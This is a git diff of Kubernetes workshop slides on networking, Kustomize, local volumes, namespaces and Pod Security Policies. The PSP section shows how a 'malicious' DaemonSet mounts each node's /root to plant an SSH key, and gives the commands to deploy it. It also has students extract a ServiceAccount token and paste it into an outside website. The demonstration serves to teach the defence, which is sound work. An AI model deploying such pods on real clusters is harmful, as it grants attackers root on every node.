- The CNI has a well-defined [specification](https://github.com/containernetworking/cni/blob/master/SPEC.md#network-configuration) for network plugins
|
||||
- Most Kubernetes clusters use CNI "plugins" to implement networking
|
||||
|
||||
- When a pod is created, Kubernetes delegates the network setup to CNI plugins
|
||||
- When a pod is created, Kubernetes delegates the network setup to these plugins
|
||||
|
||||
- Typically, a CNI plugin will:
|
||||
(it can be a single plugin, or a combination of plugins, each doing one task)
|
||||
|
||||
- Typically, CNI plugins will:
|
||||
|
||||
- allocate an IP address (by calling an IPAM plugin)
|
||||
|
||||
@@ -96,8 +102,46 @@
|
||||
|
||||
- configure the interface as well as required routes etc.
|
||||
|
||||
- Using multiple plugins can be done with "meta-plugins" like CNI-Genie or Multus
|
||||
---
|
||||
|
||||
- Not all CNI plugins are equal
|
||||
class: extra-details
|
||||
|
||||
(e.g. they don't all implement network policies, which are required to isolate pods)
|
||||
## Multiple moving parts
|
||||
|
||||
- The "pod-to-pod network" or "pod network":
|
||||
|
||||
- provides communication between pods and nodes
|
||||
|
||||
- is generally implemented with CNI plugins
|
||||
|
||||
- The "pod-to-service network":
|
||||
|
||||
- provides internal communication and load balancing
|
||||
|
||||
- is generally implemented with kube-proxy (or e.g. kube-router)
|
||||
|
||||
- Network policies:
|
||||
|
||||
- provide firewalling and isolation
|
||||
|
||||
- can be bundled with the "pod network" or provided by another component
|
||||
|
||||
---
|
||||
|
||||
class: extra-details
|
||||
|
||||
## Even more moving parts
|
||||
|
||||
- Inbound traffic can be handled by multiple components:
|
||||
|
||||
- something like kube-proxy or kube-router (for NodePort services)
|
||||
|
||||
- load balancers (ideally, connected to the pod network)
|
||||
|
||||
- It is possible to use multiple pod networks in parallel
|
||||
|
||||
(with "meta-plugins" like CNI-Genie or Multus)
|
||||
|
||||
- Some solutions can fill multiple roles
|
||||
|
||||
(e.g. kube-router can be set up to provide the pod network and/or network policies and/or replace kube-proxy)
|
||||
|
||||
194
slides/k8s/kustomize.md
Normal file
@@ -0,0 +1,194 @@
|
||||
# Kustomize
|
||||
|
||||
- Kustomize lets us transform YAML files representing Kubernetes resources
|
||||
|
||||
- The original YAML files are valid resource files
|
||||
|
||||
(e.g. they can be loaded with `kubectl apply -f`)
|
||||
|
||||
- They are left untouched by Kustomize
|
||||
|
||||
- Kustomize lets us define *overlays* that extend or change the resource files
|
||||
|
||||
---
|
||||
|
||||
## Differences with Helm
|
||||
|
||||
- Helm charts use placeholders `{{ like.this }}`
|
||||
|
||||
- Kustomize "bases" are standard Kubernetes YAML
|
||||
|
||||
- It is possible to use an existing set of YAML as a Kustomize base
|
||||
|
||||
- As a result, writing a Helm chart is more work ...
|
||||
|
||||
- ... But Helm charts are also more powerful; e.g. they can:
|
||||
|
||||
- use flags to conditionally include resources or blocks
|
||||
|
||||
- check if a given Kubernetes API group is supported
|
||||
|
||||
- [and much more](https://helm.sh/docs/chart_template_guide/)
|
||||
|
||||
---
|
||||
|
||||
## Kustomize concepts
|
||||
|
||||
- Kustomize needs a `kustomization.yaml` file
|
||||
|
||||
- That file can be a *base* or a *variant*
|
||||
|
||||
- If it's a *base*:
|
||||
|
||||
- it lists YAML resource files to use
|
||||
|
||||
- If it's a *variant* (or *overlay*):
|
||||
|
||||
- it refers to (at least) one *base*
|
||||
|
||||
- and some *patches*
|
||||
|
||||
---
|
||||
|
||||
## An easy way to get started with Kustomize
|
||||
|
||||
- We are going to use [Replicated Ship](https://www.replicated.com/ship/) to experiment with Kustomize
|
||||
|
||||
- The [Replicated Ship CLI](https://github.com/replicatedhq/ship/releases) has been installed on our clusters
|
||||
|
||||
- Replicated Ship has multiple workflows; here is what we will do:
|
||||
|
||||
- initialize a Kustomize overlay from a remote GitHub repository
|
||||
|
||||
- customize some values using the web UI provided by Ship
|
||||
|
||||
- look at the resulting files and apply them to the cluster
|
||||
|
||||
---
|
||||
|
||||
## Getting started with Ship
|
||||
|
||||
- We need to run `ship init` in a new directory
|
||||
|
||||
- `ship init` requires an URL to a remote repository containing Kubernetes YAML
|
||||
|
||||
- It will clone that repository and start a web UI
|
||||
|
||||
- Later, it can watch that repository and/or update from it
|
||||
|
||||
- We will use the [jpetazzo/kubercoins](https://github.com/jpetazzo/kubercoins) repository
|
||||
|
||||
(it contains all the DockerCoins resources as YAML files)
|
||||
|
||||
---
|
||||
|
||||
## `ship init`
|
||||
|
||||
.exercise[
|
||||
|
||||
- Change to a new directory:
|
||||
```bash
|
||||
mkdir ~/kustomcoins
|
||||
cd ~/kustomcoins
|
||||
```
|
||||
|
||||
- Run `ship init` with the kustomcoins repository:
|
||||
```bash
|
||||
ship init https://github.com/jpetazzo/kubercoins
|
||||
```
|
||||
|
||||
]
|
||||
|
||||
---
|
||||
|
||||
## Access the web UI
|
||||
|
||||
- `ship init` tells us to connect on `localhost:8800`
|
||||
|
||||
- We need to replace `localhost` with the address of our node
|
||||
|
||||
(since we run on a remote machine)
|
||||
|
||||
- Follow the steps in the web UI, and change one parameter
|
||||
|
||||
(e.g. set the number of replicas in the worker Deployment)
|
||||
|
||||
- Complete the web workflow, and go back to the CLI
|
||||
|
||||
---
|
||||
|
||||
## Inspect the results
|
||||
|
||||
- Look at the content of our directory
|
||||
|
||||
- `base` contains the kubercoins repository + a `kustomization.yaml` file
|
||||
|
||||
- `overlays/ship` contains the Kustomize overlay referencing the base + our patch(es)
|
||||
|
||||
- `rendered.yaml` is a YAML bundle containing the patched application
|
||||
|
||||
- `.ship` contains a state file used by Ship
|
||||
|
||||
---
|
||||
|
||||
## Using the results
|
||||
|
||||
- We can `kubectl apply -f rendered.yaml`
|
||||
|
||||
(on any version of Kubernetes)
|
||||
|
||||
- Starting with Kubernetes 1.14, we can apply the overlay directly with:
|
||||
```bash
|
||||
kubectl apply -k overlays/ship
|
||||
```
|
||||
|
||||
- But let's not do that for now!
|
||||
|
||||
- We will create a new copy of DockerCoins in another namespace
|
||||
|
||||
---
|
||||
|
||||
## Deploy DockerCoins with Kustomize
|
||||
|
||||
.exercise[
|
||||
|
||||
- Create a new namespace:
|
||||
```bash
|
||||
kubectl create namespace kustomcoins
|
||||
```
|
||||
|
||||
- Deploy DockerCoins:
|
||||
```bash
|
||||
kubectl apply -f rendered.yaml --namespace=kustomcoins
|
||||
```
|
||||
|
||||
- Or, with Kubernetes 1.14, you can also do this:
|
||||
```bash
|
||||
kubectl apply -k overlays/ship --namespace=kustomcoins
|
||||
```
|
||||
|
||||
]
|
||||
|
||||
---
|
||||
|
||||
## Checking our new copy of DockerCoins
|
||||
|
||||
- We can check the worker logs, or the web UI
|
||||
|
||||
.exercise[
|
||||
|
||||
- Retrieve the NodePort number of the web UI:
|
||||
```bash
|
||||
kubectl get service webui --namespace=kustomcoins
|
||||
```
|
||||
|
||||
- Open it in a web browser
|
||||
|
||||
- Look at the worker logs:
|
||||
```bash
|
||||
kubectl logs deploy/worker --tail=10 --follow --namespace=kustomcoins
|
||||
```
|
||||
|
||||
]
|
||||
|
||||
Note: it might take a minute or two for the worker to start.
|
||||
@@ -120,7 +120,7 @@
|
||||
|
||||
- Team "build" ships ready-to-run manifests
|
||||
|
||||
(YAML, Helm Charts, Kustomize ...)
|
||||
(YAML, Helm charts, Kustomize ...)
|
||||
|
||||
- Team "run" adjusts some parameters and monitors the application
|
||||
|
||||
|
||||
244
slides/k8s/local-persistent-volumes.md
Normal file
@@ -0,0 +1,244 @@
|
||||
# Local Persistent Volumes
|
||||
|
||||
- We want to run that Consul cluster *and* actually persist data
|
||||
|
||||
- But we don't have a distributed storage system
|
||||
|
||||
- We are going to use local volumes instead
|
||||
|
||||
(similar conceptually to `hostPath` volumes)
|
||||
|
||||
- We can use local volumes without installing extra plugins
|
||||
|
||||
- However, they are tied to a node
|
||||
|
||||
- If that node goes down, the volume becomes unavailable
|
||||
|
||||
---
|
||||
|
||||
## With or without dynamic provisioning
|
||||
|
||||
- We will deploy a Consul cluster *with* persistence
|
||||
|
||||
- That cluster's StatefulSet will create PVCs
|
||||
|
||||
- These PVCs will remain unbound¹, until we will create local volumes manually
|
||||
|
||||
(we will basically do the job of the dynamic provisioner)
|
||||
|
||||
- Then, we will see how to automate that with a dynamic provisioner
|
||||
|
||||
.footnote[¹Unbound = without an associated Persistent Volume.]
|
||||
|
||||
---
|
||||
|
||||
## Work in a separate namespace
|
||||
|
||||
- To avoid conflicts with existing resources, let's create and use a new namespace
|
||||
|
||||
.exercise[
|
||||
|
||||
- Create a new namespace:
|
||||
```bash
|
||||
kubectl create namespace orange
|
||||
```
|
||||
|
||||
- Switch to that namespace:
|
||||
```bash
|
||||
kns orange
|
||||
```
|
||||
|
||||
]
|
||||
|
||||
.warning[Make sure to call that namespace `orange`, because that name is hardcoded in the YAML files.]
|
||||
|
||||
---
|
||||
|
||||
## Deploying Consul
|
||||
|
||||
- We will use a slightly different YAML file
|
||||
|
||||
- The only differences between that file and the previous one are:
|
||||
|
||||
- `volumeClaimTemplate` defined in the Stateful Set spec
|
||||
|
||||
- the corresponding `volumeMounts` in the Pod spec
|
||||
|
||||
- the namespace `orange` used for discovery of Pods
|
||||
|
||||
.exercise[
|
||||
|
||||
- Apply the persistent Consul YAML file:
|
||||
```bash
|
||||
kubectl apply -f ~/container.training/k8s/persistent-consul.yaml
|
||||
```
|
||||
|
||||
]
|
||||
|
||||
---
|
||||
|
||||
## Observing the situation
|
||||
|
||||
- Let's look at Persistent Volume Claims and Pods
|
||||
|
||||
.exercise[
|
||||
|
||||
- Check that we now have an unbound Persistent Volume Claim:
|
||||
```bash
|
||||
kubectl get pvc
|
||||
```
|
||||
|
||||
- We don't have any Persistent Volume:
|
||||
```bash
|
||||
kubectl get pv
|
||||
```
|
||||
|
||||
- The Pod `consul-0` is not scheduled yet:
|
||||
```bash
|
||||
kubectl get pods -o wide
|
||||
```
|
||||
|
||||
]
|
||||
|
||||
*Hint: leave these commands running with `-w` in different windows.*
|
||||
|
||||
---
|
||||
|
||||
## Explanations
|
||||
|
||||
- In a Stateful Set, the Pods are started one by one
|
||||
|
||||
- `consul-1` won't be created until `consul-0` is running
|
||||
|
||||
- `consul-0` has a dependency on an unbound Persistent Volume Claim
|
||||
|
||||
- The scheduler won't schedule the Pod until the PVC is bound
|
||||
|
||||
(because the PVC might be bound to a volume that is only available on a subset of nodes; for instance EBS are tied to an availability zone)
|
||||
|
||||
---
|
||||
|
||||
## Creating Persistent Volumes
|
||||
|
||||
- Let's create 3 local directories (`/mnt/consul`) on node2, node3, node4
|
||||
|
||||
- Then create 3 Persistent Volumes corresponding to these directories
|
||||
|
||||
.exercise[
|
||||
|
||||
- Create the local directories:
|
||||
```bash
|
||||
for NODE in node2 node3 node4; do
|
||||
ssh $NODE sudo mkdir -p /mnt/consul
|
||||
done
|
||||
```
|
||||
|
||||
- Create the PV objects:
|
||||
```bash
|
||||
kubectl apply -f ~/container.training/k8s/volumes-for-consul.yaml
|
||||
```
|
||||
|
||||
]
|
||||
|
||||
---
|
||||
|
||||
## Check our Consul cluster
|
||||
|
||||
- The PVs that we created will be automatically matched with the PVCs
|
||||
|
||||
- Once a PVC is bound, its pod can start normally
|
||||
|
||||
- Once the pod `consul-0` has started, `consul-1` can be created, etc.
|
||||
|
||||
- Eventually, our Consul cluster is up, and backend by "persistent" volumes
|
||||
|
||||
.exercise[
|
||||
|
||||
- Check that our Consul clusters has 3 members indeed:
|
||||
```bash
|
||||
kubectl exec consul-0 consul members
|
||||
```
|
||||
|
||||
]
|
||||
|
||||
---
|
||||
|
||||
## Devil is in the details (1/2)
|
||||
|
||||
- The size of the Persistent Volumes is bogus
|
||||
|
||||
(it is used when matching PVs and PVCs together, but there is no actual quota or limit)
|
||||
|
||||
---
|
||||
|
||||
## Devil is in the details (2/2)
|
||||
|
||||
- This specific example worked because we had exactly 1 free PV per node:
|
||||
|
||||
- if we had created multiple PVs per node ...
|
||||
|
||||
- we could have ended with two PVCs bound to PVs on the same node ...
|
||||
|
||||
- which would have required two pods to be on the same node ...
|
||||
|
||||
- which is forbidden by the anti-affinity constraints in the StatefulSet
|
||||
|
||||
- To avoid that, we need to associated the PVs with a Storage Class that has:
|
||||
```yaml
|
||||
volumeBindingMode: WaitForFirstConsumer
|
||||
```
|
||||
(this means that a PVC will be bound to a PV only after being used by a Pod)
|
||||
|
||||
- See [this blog post](https://kubernetes.io/blog/2018/04/13/local-persistent-volumes-beta/) for more details
|
||||
|
||||
---
|
||||
|
||||
## Bulk provisioning
|
||||
|
||||
- It's not practical to manually create directories and PVs for each app
|
||||
|
||||
- We *could* pre-provision a number of PVs across our fleet
|
||||
|
||||
- We could even automate that with a Daemon Set:
|
||||
|
||||
- creating a number of directories on each node
|
||||
|
||||
- creating the corresponding PV objects
|
||||
|
||||
- We also need to recycle volumes
|
||||
|
||||
- ... This can quickly get out of hand
|
||||
|
||||
---
|
||||
|
||||
## Dynamic provisioning
|
||||
|
||||
- We could also write our own provisioner, which would:
|
||||
|
||||
- watch the PVCs across all namespaces
|
||||
|
||||
- when a PVC is created, create a corresponding PV on a node
|
||||
|
||||
- Or we could use one of the dynamic provisioners for local persistent volumes
|
||||
|
||||
(for instance the [Rancher local path provisioner](https://github.com/rancher/local-path-provisioner))
|
||||
|
||||
---
|
||||
|
||||
## Strategies for local persistent volumes
|
||||
|
||||
- Remember, when a node goes down, the volumes on that node become unavailable
|
||||
|
||||
- High availability will require another layer of replication
|
||||
|
||||
(like what we've just seen with Consul; or primary/secondary; etc)
|
||||
|
||||
- Pre-provisioning PVs makes sense for machines with local storage
|
||||
|
||||
(e.g. cloud instance storage; or storage directly attached to a physical machine)
|
||||
|
||||
- Dynamic provisioning makes sense for large number of applications
|
||||
|
||||
(when we can't or won't dedicate a whole disk to a volume)
|
||||
|
||||
- It's possible to mix both (using distinct Storage Classes)
|
||||
@@ -6,6 +6,24 @@
|
||||
|
||||
---
|
||||
|
||||
## Requirements
|
||||
|
||||
.warning[The exercises in this chapter should be done *on your local machine*.]
|
||||
|
||||
- `kubectl` is officially available on Linux, macOS, Windows
|
||||
|
||||
(and unofficially anywhere we can build and run Go binaries)
|
||||
|
||||
- You may skip these exercises if you are following along from:
|
||||
|
||||
- a tablet or phone
|
||||
|
||||
- a web-based terminal
|
||||
|
||||
- an environment where you can't install and run new binaries
|
||||
|
||||
---
|
||||
|
||||
## Installing `kubectl`
|
||||
|
||||
- If you already have `kubectl` on your local machine, you can skip this
|
||||
@@ -16,11 +34,11 @@
|
||||
|
||||
- Download the `kubectl` binary from one of these links:
|
||||
|
||||
[Linux](https://storage.googleapis.com/kubernetes-release/release/v1.14.1/bin/linux/amd64/kubectl)
|
||||
[Linux](https://storage.googleapis.com/kubernetes-release/release/v1.14.2/bin/linux/amd64/kubectl)
|
||||
|
|
||||
[macOS](https://storage.googleapis.com/kubernetes-release/release/v1.14.1/bin/darwin/amd64/kubectl)
|
||||
[macOS](https://storage.googleapis.com/kubernetes-release/release/v1.14.2/bin/darwin/amd64/kubectl)
|
||||
|
|
||||
[Windows](https://storage.googleapis.com/kubernetes-release/release/v1.14.1/bin/windows/amd64/kubectl.exe)
|
||||
[Windows](https://storage.googleapis.com/kubernetes-release/release/v1.14.2/bin/windows/amd64/kubectl.exe)
|
||||
|
||||
- On Linux and macOS, make the binary executable with `chmod +x kubectl`
|
||||
|
||||
@@ -65,9 +83,16 @@ Platform:"linux/amd64"}
|
||||
|
||||
- If you never used `kubectl` on your machine before: nothing to do!
|
||||
|
||||
- If you already used `kubectl` to control a Kubernetes cluster before:
|
||||
.exercise[
|
||||
|
||||
- rename `~/.kube/config` to e.g. `~/.kube/config.bak`
|
||||
- Make a copy of `~/.kube/config`; if you are using macOS or Linux, you can do:
|
||||
```bash
|
||||
cp ~/.kube/config ~/.kube/config.before.training
|
||||
```
|
||||
|
||||
- If you are using Windows, you will need to adapt this command
|
||||
|
||||
]
|
||||
|
||||
---
|
||||
|
||||
|
||||
@@ -1,26 +1,65 @@
|
||||
# Namespaces
|
||||
|
||||
- We would like to deploy another copy of DockerCoins on our cluster
|
||||
|
||||
- We could rename all our deployments and services:
|
||||
|
||||
hasher → hasher2, redis → redis2, rng → rng2, etc.
|
||||
|
||||
- That would require updating the code
|
||||
|
||||
- There as to be a better way!
|
||||
|
||||
--
|
||||
|
||||
- As hinted by the title of this section, we will use *namespaces*
|
||||
|
||||
---
|
||||
|
||||
## Identifying a resource
|
||||
|
||||
- We cannot have two resources with the same name
|
||||
|
||||
(Or can we...?)
|
||||
(or can we...?)
|
||||
|
||||
--
|
||||
|
||||
- We cannot have two resources *of the same type* with the same name
|
||||
- We cannot have two resources *of the same kind* with the same name
|
||||
|
||||
(But it's OK to have a `rng` service, a `rng` deployment, and a `rng` daemon set!)
|
||||
(but it's OK to have a `rng` service, a `rng` deployment, and a `rng` daemon set)
|
||||
|
||||
--
|
||||
|
||||
- We cannot have two resources of the same type with the same name *in the same namespace*
|
||||
- We cannot have two resources of the same kind with the same name *in the same namespace*
|
||||
|
||||
(But it's OK to have e.g. two `rng` services in different namespaces!)
|
||||
(but it's OK to have e.g. two `rng` services in different namespaces)
|
||||
|
||||
--
|
||||
|
||||
- In other words: **the tuple *(type, name, namespace)* needs to be unique**
|
||||
- Except for resources that exist at the *cluster scope*
|
||||
|
||||
(In the resource YAML, the type is called `Kind`)
|
||||
(these do not belong to a namespace)
|
||||
|
||||
---
|
||||
|
||||
## Uniquely identifying a resource
|
||||
|
||||
- For *namespaced* resources:
|
||||
|
||||
the tuple *(kind, name, namespace)* needs to be unique
|
||||
|
||||
- For resources at the *cluster scope*:
|
||||
|
||||
the tuple *(kind, name)* needs to be unique
|
||||
|
||||
.exercise[
|
||||
|
||||
- List resource types again, and check the NAMESPACED column:
|
||||
```bash
|
||||
kubectl api-resources
|
||||
```
|
||||
|
||||
]
|
||||
|
||||
---
|
||||
|
||||
@@ -42,12 +81,16 @@
|
||||
|
||||
## Creating namespaces
|
||||
|
||||
- Creating a namespace is done with the `kubectl create namespace` command:
|
||||
- Let's see two identical methods to create a namespace
|
||||
|
||||
.exercise[
|
||||
|
||||
- We can use `kubectl create namespace`:
|
||||
```bash
|
||||
kubectl create namespace blue
|
||||
```
|
||||
|
||||
- We can also get fancy and use a very minimal YAML snippet, e.g.:
|
||||
- Or we can construct a very minimal YAML snippet:
|
||||
```bash
|
||||
kubectl apply -f- <<EOF
|
||||
apiVersion: v1
|
||||
@@ -57,9 +100,9 @@
|
||||
EOF
|
||||
```
|
||||
|
||||
- The two methods above are identical
|
||||
]
|
||||
|
||||
- If we are using a tool like Helm, it will create namespaces automatically
|
||||
- Some tools like Helm will create namespaces automatically when needed
|
||||
|
||||
---
|
||||
|
||||
@@ -155,7 +198,7 @@
|
||||
|
||||
## Using our new namespace
|
||||
|
||||
- Let's check that we are in our new namespace, then deploy the DockerCoins chart
|
||||
- Let's check that we are in our new namespace, then deploy a new copy of Dockercoins
|
||||
|
||||
.exercise[
|
||||
|
||||
@@ -164,21 +207,38 @@
|
||||
kubectl get all
|
||||
```
|
||||
|
||||
- Deploy DockerCoins:
|
||||
]
|
||||
|
||||
---
|
||||
|
||||
## Deploying DockerCoins with YAML files
|
||||
|
||||
- The GitHub repository `jpetazzo/kubercoins` contains everything we need!
|
||||
|
||||
.exercise[
|
||||
|
||||
- Clone the kubercoins repository:
|
||||
```bash
|
||||
helm install dockercoins
|
||||
cd ~
|
||||
git clone https://github.com/jpetazzo/kubercoins
|
||||
```
|
||||
|
||||
- Create all the DockerCoins resources:
|
||||
```bash
|
||||
kubectl create -f kubercoins
|
||||
```
|
||||
|
||||
]
|
||||
|
||||
In the last command line, `dockercoins` is just the local path where
|
||||
we created our Helm chart before.
|
||||
If the argument behind `-f` is a directory, all the files in that directory are processed.
|
||||
|
||||
The subdirectories are *not* processed, unless we also add the `-R` flag.
|
||||
|
||||
---
|
||||
|
||||
## Viewing the deployed app
|
||||
|
||||
- Let's see if our Helm chart worked correctly!
|
||||
- Let's see if this worked correctly!
|
||||
|
||||
.exercise[
|
||||
|
||||
@@ -191,46 +251,7 @@ we created our Helm chart before.
|
||||
|
||||
]
|
||||
|
||||
If the graph shows up but stays at zero, check the next slide!
|
||||
|
||||
---
|
||||
|
||||
## Troubleshooting
|
||||
|
||||
If did the exercices from the chapter about labels and selectors,
|
||||
the app that you just created may not work, because the `rng` service
|
||||
selector has `enabled=yes` but the pods created by the `rng` daemon set
|
||||
do not have that label.
|
||||
|
||||
How can we troubleshoot that?
|
||||
|
||||
- Query individual services manually
|
||||
|
||||
→ the `rng` service will time out
|
||||
|
||||
- Inspect the services with `kubectl describe service`
|
||||
|
||||
→ the `rng` service will have an empty list of backends
|
||||
|
||||
---
|
||||
|
||||
## Fixing the broken service
|
||||
|
||||
The easiest option is to add the `enabled=yes` label to the relevant pods.
|
||||
|
||||
.exercise[
|
||||
|
||||
- Add the `enabled` label to the pods of the `rng` daemon set:
|
||||
```bash
|
||||
kubectl label pods -l app=rng enabled=yes
|
||||
```
|
||||
|
||||
]
|
||||
|
||||
The *best* option is to change either the service definition, or the
|
||||
daemon set definition, so that their respective selectors match correctly.
|
||||
|
||||
*This is left as an exercise for the reader!*
|
||||
If the graph shows up but stays at zero, give it a minute or two!
|
||||
|
||||
---
|
||||
|
||||
|
||||
@@ -11,6 +11,7 @@
|
||||
|
||||
- Deploy everything else:
|
||||
```bash
|
||||
set -u
|
||||
for SERVICE in hasher rng webui worker; do
|
||||
kubectl create deployment $SERVICE --image=$REGISTRY/$SERVICE:$TAG
|
||||
done
|
||||
|
||||
601
slides/k8s/podsecuritypolicy.md
Normal file
@@ -0,0 +1,601 @@
|
||||
# Pod Security Policies
|
||||
|
||||
- By default, our pods and containers can do *everything*
|
||||
|
||||
(including taking over the entire cluster)
|
||||
|
||||
- We are going to show an example of a malicious pod
|
||||
|
||||
- Then we will explain how to avoid this with PodSecurityPolicies
|
||||
|
||||
- We will illustrate this by creating a non-privileged user limited to a namespace
|
||||
|
||||
---
|
||||
|
||||
## Setting up a namespace
|
||||
|
||||
- Let's create a new namespace called "green"
|
||||
|
||||
.exercise[
|
||||
|
||||
- Create the "green" namespace:
|
||||
```bash
|
||||
kubectl create namespace green
|
||||
```
|
||||
|
||||
- Change to that namespace:
|
||||
```bash
|
||||
kns green
|
||||
```
|
||||
|
||||
]
|
||||
|
||||
---
|
||||
|
||||
## Using limited credentials
|
||||
|
||||
- When a namespace is created, a `default` ServiceAccount is added
|
||||
|
||||
- By default, this ServiceAccount doesn't have any access rights
|
||||
|
||||
- We will use this ServiceAccount as our non-privileged user
|
||||
|
||||
- We will obtain this ServiceAccount's token and add it to a context
|
||||
|
||||
- Then we will give basic access rights to this ServiceAccount
|
||||
|
||||
---
|
||||
|
||||
## Obtaining the ServiceAccount's token
|
||||
|
||||
- The token is stored in a Secret
|
||||
|
||||
- The Secret is listed in the ServiceAccount
|
||||
|
||||
.exercise[
|
||||
|
||||
- Obtain the name of the Secret from the ServiceAccount::
|
||||
```bash
|
||||
SECRET=$(kubectl get sa default -o jsonpath={.secrets[0].name})
|
||||
```
|
||||
|
||||
- Extract the token from the Secret object:
|
||||
```bash
|
||||
TOKEN=$(kubectl get secrets $SECRET -o jsonpath={.data.token}
|
||||
| base64 -d)
|
||||
```
|
||||
|
||||
]
|
||||
|
||||
---
|
||||
|
||||
class: extra-details
|
||||
|
||||
## Inspecting a Kubernetes token
|
||||
|
||||
- Kubernetes tokens are JSON Web Tokens
|
||||
|
||||
(as defined by [RFC 7519](https://tools.ietf.org/html/rfc7519))
|
||||
|
||||
- We can view their content (and even verify them) easily
|
||||
|
||||
.exercise[
|
||||
|
||||
- Display the token that we obtained:
|
||||
```bash
|
||||
echo $TOKEN
|
||||
```
|
||||
|
||||
- Copy paste the token in the verification form on https://jwt.io
|
||||
|
||||
]
|
||||
|
||||
---
|
||||
|
||||
## Authenticating using the ServiceAccount token
|
||||
|
||||
- Let's create a new *context* accessing our cluster with that token
|
||||
|
||||
.exercise[
|
||||
|
||||
- First, add the token credentials to our kubeconfig file:
|
||||
```bash
|
||||
kubectl config set-credentials green --token=$TOKEN
|
||||
```
|
||||
|
||||
- Then, create a new context using these credentials:
|
||||
```bash
|
||||
kubectl config set-context green --user=green --cluster=kubernetes
|
||||
```
|
||||
|
||||
- Check the results:
|
||||
```bash
|
||||
kubectl config get-contexts
|
||||
```
|
||||
|
||||
]
|
||||
|
||||
---
|
||||
|
||||
## Using the new context
|
||||
|
||||
- Normally, this context doesn't let us access *anything* (yet)
|
||||
|
||||
.exercise[
|
||||
|
||||
- Change to the new context with one of these two commands:
|
||||
```bash
|
||||
kctx green
|
||||
kubectl config use-context green
|
||||
```
|
||||
|
||||
- Also change to the green namespace in that context:
|
||||
```bash
|
||||
kns green
|
||||
```
|
||||
|
||||
- Confirm that we don't have access to anything:
|
||||
```bash
|
||||
kubectl get all
|
||||
```
|
||||
|
||||
]
|
||||
|
||||
---
|
||||
|
||||
## Giving basic access rights
|
||||
|
||||
- Let's bind the ClusterRole `edit` to our ServiceAccount
|
||||
|
||||
- To allow access only to the namespace, we use a RoleBinding
|
||||
|
||||
(instead of a ClusterRoleBinding, which would give global access)
|
||||
|
||||
.exercise[
|
||||
|
||||
- Switch back to `cluster-admin`:
|
||||
```bash
|
||||
kctx -
|
||||
```
|
||||
|
||||
- Create the Role Binding:
|
||||
```bash
|
||||
kubectl create rolebinding green --clusterrole=edit --serviceaccount=green:default
|
||||
```
|
||||
|
||||
]
|
||||
|
||||
---
|
||||
|
||||
## Verifying access rights
|
||||
|
||||
- Let's switch back to the `green` context and check that we have rights
|
||||
|
||||
.exercise[
|
||||
|
||||
- Switch back to `green`:
|
||||
```bash
|
||||
kctx green
|
||||
```
|
||||
|
||||
- Check our permissions:
|
||||
```bash
|
||||
kubectl get all
|
||||
```
|
||||
|
||||
]
|
||||
|
||||
We should see an empty list.
|
||||
|
||||
(Better than a series of permission errors!)
|
||||
|
||||
---
|
||||
|
||||
## Creating a basic Deployment
|
||||
|
||||
- Just to demonstrate that everything works correctly, deploy NGINX
|
||||
|
||||
.exercise[
|
||||
|
||||
- Create a Deployment using the official NGINX image:
|
||||
```bash
|
||||
kubectl create deployment web --image=nginx
|
||||
```
|
||||
|
||||
- Confirm that the Deployment, ReplicaSet, and Pod exist, and Pod is running:
|
||||
```bash
|
||||
kubectl get all
|
||||
```
|
||||
|
||||
]
|
||||
|
||||
---
|
||||
|
||||
## One example of malicious pods
|
||||
|
||||
- We will now show an escalation technique in action
|
||||
|
||||
- We will deploy a DaemonSet that adds our SSH key to the root account
|
||||
|
||||
(on *each* node of the cluster)
|
||||
|
||||
- The Pods of the DaemonSet will do so by mounting `/root` from the host
|
||||
|
||||
.exercise[
|
||||
|
||||
- Check the file `k8s/hacktheplanet.yaml` with a text editor:
|
||||
```bash
|
||||
vim ~/container.training/k8s/hacktheplanet.yaml
|
||||
```
|
||||
|
||||
- If you would like, change the SSH key (by changing the GitHub user name)
|
||||
|
||||
]
|
||||
|
||||
---
|
||||
|
||||
## Deploying the malicious pods
|
||||
|
||||
- Let's deploy our "exploit"!
|
||||
|
||||
.exercise[
|
||||
|
||||
- Create the DaemonSet:
|
||||
```bash
|
||||
kubectl create -f ~/container.training/k8s/hacktheplanet.yaml
|
||||
```
|
||||
|
||||
- Check that the pods are running:
|
||||
```bash
|
||||
kubectl get pods
|
||||
```
|
||||
|
||||
- Confirm that the SSH key was added to the node's root account:
|
||||
```bash
|
||||
sudo cat /root/.ssh/authorized_keys
|
||||
```
|
||||
|
||||
]
|
||||
|
||||
---
|
||||
|
||||
## Cleaning up
|
||||
|
||||
- Before setting up our PodSecurityPolicies, clean up that namespace
|
||||
|
||||
.exercise[
|
||||
|
||||
- Remove the DaemonSet:
|
||||
```bash
|
||||
kubectl delete daemonset hacktheplanet
|
||||
```
|
||||
|
||||
- Remove the Deployment:
|
||||
```bash
|
||||
kubectl delete deployment web
|
||||
```
|
||||
|
||||
]
|
||||
|
||||
---
|
||||
|
||||
## Pod Security Policies in theory
|
||||
|
||||
- To use PSPs, we need to activate their specific *admission controller*
|
||||
|
||||
- That admission controller will intercept each pod creation attempt
|
||||
|
||||
- It will look at:
|
||||
|
||||
- *who/what* is creating the pod
|
||||
|
||||
- which PodSecurityPolicies they can use
|
||||
|
||||
- which PodSecurityPolicies can be used by the Pod's ServiceAccount
|
||||
|
||||
- Then it will compare the Pod with each PodSecurityPolicy one by one
|
||||
|
||||
- If a PodSecurityPolicy accepts all the parameters of the Pod, it is created
|
||||
|
||||
- Otherwise, the Pod creation is denied and it won't even show up in `kubectl get pods`
|
||||
|
||||
---
|
||||
|
||||
## Pod Security Policies fine print
|
||||
|
||||
- With RBAC, using a PSP corresponds to the verb `use` on the PSP
|
||||
|
||||
(that makes sense, right?)
|
||||
|
||||
- If no PSP is defined, no Pod can be created
|
||||
|
||||
(even by cluster admins)
|
||||
|
||||
- Pods that are already running are *not* affected
|
||||
|
||||
- If we create a Pod directly, it can use a PSP to which *we* have access
|
||||
|
||||
- If the Pod is created by e.g. a ReplicaSet or DaemonSet, it's different:
|
||||
|
||||
- the ReplicaSet / DaemonSet controllers don't have access to *our* policies
|
||||
|
||||
- therefore, we need to give access to the PSP to the Pod's ServiceAccount
|
||||
|
||||
---
|
||||
|
||||
## Pod Security Policies in practice
|
||||
|
||||
- We are going to enable the PodSecurityPolicy admission controller
|
||||
|
||||
- At that point, we won't be able to create any more pods (!)
|
||||
|
||||
- Then we will create a couple of PodSecurityPolicies
|
||||
|
||||
- ... And associated ClusterRoles (giving `use` access to the policies)
|
||||
|
||||
- Then we will create RoleBindings to grant these roles to ServiceAccounts
|
||||
|
||||
- We will verify that we can't run our "exploit" anymore
|
||||
|
||||
---
|
||||
|
||||
## Enabling Pod Security Policies
|
||||
|
||||
